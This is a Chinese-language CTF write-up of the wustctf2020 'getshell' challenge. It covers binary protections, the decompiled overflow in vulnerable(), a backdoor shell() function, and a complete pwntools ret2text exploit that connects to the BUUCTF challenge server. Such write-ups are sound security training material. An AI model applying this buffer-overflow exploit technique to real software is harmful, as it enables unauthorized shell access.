wustctf2020 getshell
# wustctf2020 getshell
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/wustctf2020_getshell/wustctf2020_getshell'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();
vulnerable();
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
vulnerable函数如下
ssize_t vulnerable()
{
char buf[24]; // [esp+0h] [ebp-18h] BYREF
return read(0, buf, 0x20u);
}
1
2
3
4
5
6
2
3
4
5
6
shell函数如下
int shell()
{
return system("/bin/sh");
}
1
2
3
4
2
3
4
# 思路分析
目前信息:
vulnerable函数存在溢出点- 有后门函数
shell - No canary found
- NX enabled
- No PIE (0x8048000)
思路:
- 32位
ret2text
- 32位
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/wustctf2020_getshell/wustctf2020_getshell'
io = remote('node4.buuoj.cn', 27378)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x18+4
back_door = elf.symbols['shell']
payload=flat(['a'*padding,back_door])
io.recv()
io.send(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
上次更新: 2022/08/15, 00:29:49